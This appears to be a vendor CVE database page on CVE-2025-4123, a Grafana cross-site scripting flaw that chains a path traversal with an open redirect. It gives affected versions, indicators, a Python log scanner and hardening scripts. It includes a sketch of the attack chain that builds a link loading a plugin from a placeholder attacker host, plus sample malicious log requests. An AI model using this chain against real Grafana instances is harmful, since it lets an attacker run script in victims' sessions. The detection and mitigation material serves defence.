SentinelOne
CVE Vulnerability Database

CVE-2025-4123: Grafana XSS Vulnerability via Redirect

CVE-2025-4123 is a cross-site scripting (XSS) vulnerability in Grafana that chains a client-side path traversal with an open redirect to run attacker-supplied JavaScript in a victim's browser. No editor role is needed, and when anonymous access is enabled the attacker needs no account at all.


CVE-2025-4123 Overview

A cross-site scripting (XSS) vulnerability exists in Grafana, caused by combining a client-side path traversal with an open redirect. An attacker can redirect a user to a website hosting a malicious frontend plugin, whose JavaScript then executes in the user's Grafana session. The attack does not require editor permissions and works without authentication if anonymous access is enabled. If the Grafana Image Renderer plugin is installed, the same open redirect can be used to achieve a full-read server-side request forgery (SSRF).

Critical Impact

Attacker-controlled JavaScript runs in the victim's Grafana origin, so it acts with that user's permissions: it can read dashboards and data-source results the user can see and call the Grafana API on the user's behalf. With the Image Renderer plugin installed, the open redirect additionally yields a full-read SSRF from the Grafana server. Grafana itself rates the issue High (CVSS 7.6) rather than Critical; the "Critical" label above reflects the impact of a successful chain, not the vendor score.

Affected Products

  • Grafana releases before 10.4.18+security-01 (10.4 branch)
  • Grafana releases before 11.2.9+security-01 (11.2 branch)
  • Grafana releases before 11.3.6+security-01 (11.3 branch)

The "+security-01" suffix marks the patched builds: plain 10.4.18, 11.2.9 and 11.3.6 are not fixed. Later branches received equivalent +security-01 builds; consult Grafana's advisory for the full list.

Discovery Timeline

  • 2025-05-22 - CVE-2025-4123 published to NVD
  • 2025-08-15 - Last updated in NVD database

Dates for discovery, responsible disclosure, CVE assignment and the Grafana patch release are not listed here; see Grafana's advisory.

Technical Details for CVE-2025-4123

Vulnerability Analysis

The vulnerability is a chain of two weaknesses in Grafana's frontend. A client-side path traversal lets a crafted URL change which path the frontend resolves when it loads a plugin, and an open redirect lets that resolved location point at an attacker's host. Together they cause the victim's browser to fetch and execute an attacker-hosted frontend plugin inside the Grafana origin, which is what makes this XSS rather than a plain redirect.

Root Cause

Two input-validation gaps: Grafana did not restrict redirect targets to its own origin (the open redirect), and the frontend did not normalise `..` path segments before building plugin URLs (the client-side path traversal). Each is a low-severity issue on its own; chained, they give script execution, and with the Image Renderer installed the redirect is also reachable from the server side, which is where the SSRF comes from.

Attack Vector

Network. The attacker crafts a Grafana URL and gets a user to open it (a link in a message, or a page that navigates to it); nothing beyond opening the link is required. If anonymous access is enabled, the victim does not even need to be logged in.

javascript
// Illustrative sketch of the attack chain, not a working exploit: the real
// traversal sequence and redirect parameter are documented in Grafana's advisory.
// 1. The attacker hosts a frontend plugin (a JavaScript module) on their own site.
// 2. A crafted Grafana URL combines the client-side path traversal with the open
//    redirect, so Grafana's frontend resolves the plugin module URL off-host.
// 3. The victim opens the link; their browser loads and runs the module in the
//    Grafana origin, with the victim's session.
const grafana = 'https://grafana.example';                    // victim's instance (placeholder)
const attackerPlugin = 'https://attacker.example/module.js';  // attacker-hosted plugin (placeholder)
// <traversal> and <redirect-param> stand in for the advisory's specifics
const craftedLink = `${grafana}/<traversal>?<redirect-param>=${encodeURIComponent(attackerPlugin)}`;
// craftedLink is what gets delivered to the victim; no editor role is needed.

Detection Methods for CVE-2025-4123

Indicators of Compromise

  • Requests to Grafana whose path contains traversal sequences (`..`, `%2e%2e`) or whose redirect-style query parameter carries an absolute or scheme-relative URL to a host other than the Grafana instance
  • Browser or proxy telemetry showing Grafana plugin module scripts being loaded from an origin other than the Grafana host
  • If the Image Renderer plugin is installed, outbound requests from the renderer or the Grafana server to unexpected internal or external URLs (the SSRF half of the chain)
  • Anonymous (unauthenticated) requests reaching plugin or redirect endpoints on instances where anonymous access is supposed to be off

Detection Strategies

Security teams should monitor access logs from Grafana and any reverse proxy in front of it for 3xx responses whose Location header, or whose request parameters, point to an external domain, and for request paths containing encoded or literal traversal sequences. A redirect to an unknown host immediately following a traversal-shaped request is the signature of this chain.

Monitoring Recommendations

Keep full request URIs (including query strings) in Grafana and proxy access logs, since the crafted link is visible there; alert on the patterns above; and, where browser or endpoint telemetry is available, alert on script loads into the Grafana origin from hosts outside it. If the Image Renderer is deployed, log and alert on its outbound destinations as well.
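The checks described in this section can be run over ordinary access logs. The following is an added example (mine, not SentinelOne's or Grafana's code) that scans combined-format log lines for the two request shapes of interest: a traversal sequence in the request path, and a query parameter carrying an absolute or scheme-relative URL to a host other than the Grafana instance. The log lines, the trusted host name, and the paths and parameter names (`redirectTo`, `next`) are constructed assumptions for illustration; the advisory's exact endpoint is not reproduced here.

```python
"""Scan HTTP access-log lines for request shapes associated with the
CVE-2025-4123 chain: traversal sequences in the path and query parameters
that point at a non-Grafana host. Added example; not vendor code."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Combined Log Format lines (not real traffic). Paths and
# parameter names are illustrative assumptions, not the advisory's.
SAMPLE_LOG = """\
10.0.0.5 - - [22/May/2025:10:01:02 +0000] "GET /d/abc123/overview HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [22/May/2025:10:01:07 +0000] "GET /public/plugins/..%2F..%2Flogin?redirectTo=https://evil.example/plugin HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [22/May/2025:10:01:08 +0000] "GET /login?redirectTo=/dashboards HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [22/May/2025:10:02:15 +0000] "GET /api/frontend/settings?next=//evil.example/x HTTP/1.1" 200 800 "-" "curl/8.0"
"""

# Assumed: the host names under which this Grafana instance is legitimately served.
GRAFANA_HOSTS = {"grafana.internal.example"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# ".." or "%2e%2e" followed by a slash, backslash, or their percent-encodings
TRAVERSAL_RE = re.compile(r'(?:\.\.|%2e%2e)(?:/|%2f|\\|%5c)', re.IGNORECASE)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*:', re.IGNORECASE)


def external_redirect_targets(query):
    """Return (param, host) for every query value that is an absolute or
    scheme-relative (//host/...) URL pointing at a non-Grafana host."""
    hits = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        value = value.strip()
        if value.startswith("//"):
            host = urlsplit("https:" + value).hostname
        elif SCHEME_RE.match(value):
            host = urlsplit(value).hostname
        else:
            continue  # relative path such as /dashboards: same-origin, fine
        if host and host not in GRAFANA_HOSTS:
            hits.append((key, host))
    return hits


def scan_line(line):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    reasons = []
    # Check both the raw and the decoded path so single encoding is not a bypass
    if TRAVERSAL_RE.search(parts.path) or TRAVERSAL_RE.search(unquote(parts.path)):
        reasons.append("traversal sequence in path")
    for key, host in external_redirect_targets(parts.query):
        reasons.append(f"param {key!r} points to external host {host}")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "target": target,
            "status": m.group("status"), "reasons": reasons}


def scan_log(text):
    """Scan every line; return the list of findings in log order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["target"], "|", "; ".join(hit["reasons"]))
```

Two of the four constructed lines are flagged: the traversal-plus-external-redirect request and the scheme-relative `//evil.example` value; the legitimate `redirectTo=/dashboards` login redirect is not, which is the distinction worth keeping in a production rule.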

How to Mitigate CVE-2025-4123

Immediate Actions Required

  • Update Grafana to a fixed +security-01 build for your branch
  • Disable anonymous access ([auth.anonymous] enabled = false) unless it is required, so the attacker needs an authenticated victim
  • Enable Grafana's built-in Content-Security-Policy ([security] content_security_policy = true) to restrict where scripts can be loaded from

Patch Information

Grafana has released fixed builds 10.4.18+security-01, 11.2.9+security-01 and 11.3.6+security-01, with equivalent +security-01 builds for later branches. Details, including the full list of fixed versions, are in Grafana's security advisory for CVE-2025-4123.

Workarounds

If patching must wait, two settings reduce exposure: enable Grafana's built-in Content-Security-Policy so the browser refuses scripts from origins other than Grafana's own, and disable anonymous access so the chain requires a logged-in victim. Neither is a substitute for the patch; the open redirect and the Image Renderer SSRF path remain until the fixed build is installed.

bash
# Configuration example: the anonymous-access switch is [auth.anonymous] enabled,
# not [security] disable_anonymous_access. Grafana also reads every setting as an
# environment variable GF_<SECTION>_<KEY>, which avoids appending a duplicate
# section to grafana.ini; shown here as a systemd drop-in.
sudo mkdir -p /etc/systemd/system/grafana-server.service.d && sudo tee /etc/systemd/system/grafana-server.service.d/hardening.conf <<'EOT'
[Service]
Environment=GF_AUTH_ANONYMOUS_ENABLED=false
Environment=GF_SECURITY_CONTENT_SECURITY_POLICY=true
EOT
sudo systemctl daemon-reload && sudo systemctl restart grafana-server
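To verify the workaround across a fleet rather than trusting that the edit landed, the following added example (mine, not Grafana's or SentinelOne's code) audits a grafana.ini for the two settings this page recommends, reports deviations, and writes a hardened copy. The settings checked are real Grafana keys ([auth.anonymous] enabled and [security] content_security_policy, both of which default to false when absent); the sample ini is constructed.

```python
"""Audit grafana.ini for anonymous access and CSP, and emit a hardened copy.
Added example; not Grafana's or SentinelOne's code."""
import configparser
import io

# Constructed weak configuration: anonymous viewer access on, CSP off.
WEAK_INI = """\
[server]
root_url = https://grafana.internal.example/

[auth.anonymous]
enabled = true
org_role = Viewer

[security]
content_security_policy = false
"""

# (section, key, expected value). Grafana's default for both keys is "false"
# when the key is absent, so a missing key is reported only where the
# expected value differs from that default.
REQUIRED = [
    ("auth.anonymous", "enabled", "false"),
    ("security", "content_security_policy", "true"),
]
GRAFANA_DEFAULT = "false"


def load_ini(text):
    # interpolation=None: grafana.ini values may contain literal '%' sequences
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string(text)
    return cp


def audit(text):
    """Return a list of (section, key, current, expected) findings."""
    cp = load_ini(text)
    findings = []
    for section, key, expected in REQUIRED:
        current = cp.get(section, key, fallback=None)
        effective = (current if current is not None else GRAFANA_DEFAULT).strip().lower()
        if effective != expected:
            findings.append((section, key, current, expected))
    return findings


def harden(text):
    """Return the ini text with the required values set in their proper sections."""
    cp = load_ini(text)
    for section, key, value in REQUIRED:
        if not cp.has_section(section):
            cp.add_section(section)
        cp.set(section, key, value)
    out = io.StringIO()
    cp.write(out)
    return out.getvalue()


if __name__ == "__main__":
    for section, key, current, expected in audit(WEAK_INI):
        print(f"[{section}] {key} = {current!r}, expected {expected!r}")
    print(harden(WEAK_INI))
```

Run `audit()` against the file actually loaded by the running instance (or against the effective config Grafana reports), since environment overrides such as GF_AUTH_ANONYMOUS_ENABLED take precedence over the ini and an audit of the file alone can be misleading.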

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.